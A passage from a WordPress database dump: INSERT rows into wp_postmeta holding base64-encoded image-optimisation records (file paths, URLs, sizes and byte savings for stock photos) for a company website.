N0ZWFtLUNvbnRyb2wtVmFsdmUtNTEweDQ3MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg5MTcsImlkIjoyMzIzfV0='); 
INSERT INTO `wp_postmeta` VALUES (28842, 2320, 'wpfc_optimisation_reduction', '3184689'); 
INSERT INTO `wp_postmeta` VALUES (28843, 2320, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQxOTgxMDIwOS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MTk4MTAyMDkuanBnIiwid2lkdGgiOjQyNzMsImhlaWdodCI6Mjg0OSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MTk4MTAyMDkuanBnIiwicmVkdWN0aW9uIjozMTg0NjgxLCJ0aW1lIjoxNDgzNTQ4OTI5LCJpZCI6IjIzMjAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MTk4MTAyMDktMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDE5ODEwMjA5LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQxOTgxMDIwOS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODkzMiwiaWQiOjIzMjB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQxOTgxMDIwOS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MTk4MTAyMDktODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDE5ODEwMjA5LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4OTM1LCJpZCI6MjMyMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDE5ODEwMjA5LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQxOTgxMDIwOS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MTk4MTAyMDktNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg5MzgsImlkIjoyMzIwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MTk4MTAyMDktMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQxOTgxMDIwOS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQxOTgxMDIwOS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4OTQxLCJpZCI6MjMyMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDE5ODEwMjA5LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQxOTgxMDIwOS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MTk4MTAyMDktMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg5NDQsImlkIjoyMzIwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MTk4MTAyMDktMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDE5ODEwMjA5LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQxOTgxMDIwOS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODk0NiwiaWQiOjIzMjB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQxOTgxMDIwOS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MTk4MTAyMDktMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDE5ODEwMjA5LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4OTQ5LCJpZCI6MjMyMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDE5ODEwMjA5LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQxOTgxMDIwOS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MTk4MTAyMDktNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg5NTIsImlkIjoyMzIwfV0='); 
INSERT INTO `wp_postmeta` VALUES (28844, 2318, 'wpfc_optimisation_reduction', '3009345'); 
INSERT INTO `wp_postmeta` VALUES (28845, 2318, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNjY5NjA3LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNjY5NjA3LmpwZyIsIndpZHRoIjozNzUwLCJoZWlnaHQiOjI1MDAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNzI2Njk2MDcuanBnIiwicmVkdWN0aW9uIjozMDA5MzM3LCJ0aW1lIjoxNDgzNTQ4OTY1LCJpZCI6IjIzMTgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja183MjY2OTYwNy0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja183MjY2OTYwNy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja183MjY2OTYwNy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODk2OCwiaWQiOjIzMTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNjY5NjA3LTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNjY5NjA3LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNjY5NjA3LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4OTcxLCJpZCI6MjMxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNzI2Njk2MDctNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNzI2Njk2MDctNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNzI2Njk2MDctNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg5NzQsImlkIjoyMzE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja183MjY2OTYwNy0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNzI2Njk2MDctMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja183MjY2OTYwNy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4OTc4LCJpZCI6MjMxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNzI2Njk2MDctMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNzI2Njk2MDctMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNzI2Njk2MDctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg5ODEsImlkIjoyMzE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja183MjY2OTYwNy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja183MjY2OTYwNy0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja183MjY2OTYwNy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODk4MywiaWQiOjIzMTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNjY5NjA3LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNjY5NjA3LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNjY5NjA3LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4OTg2LCJpZCI6MjMxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNzI2Njk2MDctNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNzI2Njk2MDctNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNzI2Njk2MDctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg5ODksImlkIjoyMzE4fV0='); 
INSERT INTO `wp_postmeta` VALUES (28846, 2313, 'wpfc_optimisation_reduction', '10417'); 
INSERT INTO `wp_postmeta` VALUES (28847, 2313, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxOTcyNjAxOS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTk3MjYwMTkuanBnIiwid2lkdGgiOjUxOTEsImhlaWdodCI6MzQ2MSwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0ODk5MywiaWQiOiIyMzEzIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE5NzI2MDE5LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxOTcyNjAxOS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTk3MjYwMTktMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjU3NywidGltZSI6MTQ4MzU0ODk5NywiaWQiOjIzMTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxOTcyNjAxOS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTk3MjYwMTktODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE5NzI2MDE5LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxMTEyLCJ0aW1lIjoxNDgzNTQ5MDAxLCJpZCI6MjMxM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE5NzI2MDE5LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxOTcyNjAxOS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTk3MjYwMTktNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjk1NywidGltZSI6MTQ4MzU0OTAwNCwiaWQiOjIzMTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxOTcyNjAxOS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE5NzI2MDE5LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE5NzI2MDE5LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjU0MTYsInRpbWUiOjE0ODM1NDkwMDksImlkIjoyMzEzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTk3MjYwMTktMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE5NzI2MDE5LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxOTcyNjAxOS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTA2LCJ0aW1lIjoxNDgzNTQ5MDEyLCJpZCI6MjMxM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE5NzI2MDE5LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxOTcyNjAxOS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTk3MjYwMTktMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ3NywidGltZSI6MTQ4MzU0OTAxNSwiaWQiOjIzMTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxOTcyNjAxOS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMj